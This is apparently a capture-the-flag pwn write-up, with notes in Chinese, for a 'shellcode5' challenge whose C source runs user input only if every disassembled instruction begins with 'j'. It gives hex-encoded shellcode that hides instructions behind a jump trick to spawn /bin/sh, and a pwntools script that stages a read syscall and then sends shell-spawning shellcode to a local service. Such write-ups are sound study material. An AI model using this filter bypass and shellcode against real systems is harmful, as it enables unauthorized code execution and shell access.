shellcode5
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
#include <capstone/capstone.h>
#include <sys/mman.h>
int upkeep() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
}
int validate(char* ptr, size_t len) {
csh handle;
cs_insn *insn;
int ret = 1;
if (cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK) {
return 0;
}
size_t count = cs_disasm(handle, ptr, len, 0, 0, &insn);
size_t success_len = 0;
if (count > 0) {
for (size_t j = 0; j < count; j++) {
ret &= insn[j].mnemonic[0] == 'j';
success_len += insn[j].size;
}
cs_free(insn, count);
} else {
return 0;
}
cs_close(&handle);
ret &= len == success_len;
return ret;
}
int main() {
upkeep();
char code[4096];
size_t n = read(0, code, 0x1000);
if (n > 0 && validate(code, n)) {
((void (*)())code)();
}
return 0;
}
要滿足shellcode都是j開頭的指令
所以就是每一次先jmp下一條指令,然後短跳轉開始我們的shellcode指令
EB 01 E9 48 31 FF 90
EB 01 E9 48 31 F6 90
EB 01 E9 48 31 D2 90
EB 01 E9 48 31 C0 90
EB 01 E9 48 31 DB 90
EB 01 E9 50 90 90 90
EB 01 E9 B3 68 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 73 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 2F 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 2F 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 6E 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 69 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 62 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 2F 90 90
EB 01 E9 53 90 90 90
EB 01 E9 48 89 E7 90
EB 01 E9 B0 3B 90 90
EB 01 E9 0F 05 90 90
彙編是這樣
from pwn import *
elf = ELF("shellcode5")
context.log_level = "debug"
context.binary = elf
skip = asm("""
jmp here+1
here:
""")
set_rdi_rsi = asm("""
push rdx
pop rsi
xor edi, edi
""")
set_rdx = asm("""
mov al, 255
mov edx, eax
""")
set_rax_syscall = asm("""
xor eax, eax
syscall
""")
# rax = 0, rdi = 0, rsi = ptr, rdx = len
p = remote("127.0.0.1", 37251)
# p = process()
# p = elf.debug()
first = skip + b"\xe9" + set_rdi_rsi + skip + b"\xe9" + set_rdx + skip +
b"\xe9" + set_rax_syscall
p.send(first)
pause()
p.send(b"A" * len(first) + asm(shellcraft.sh()))
p.interactive()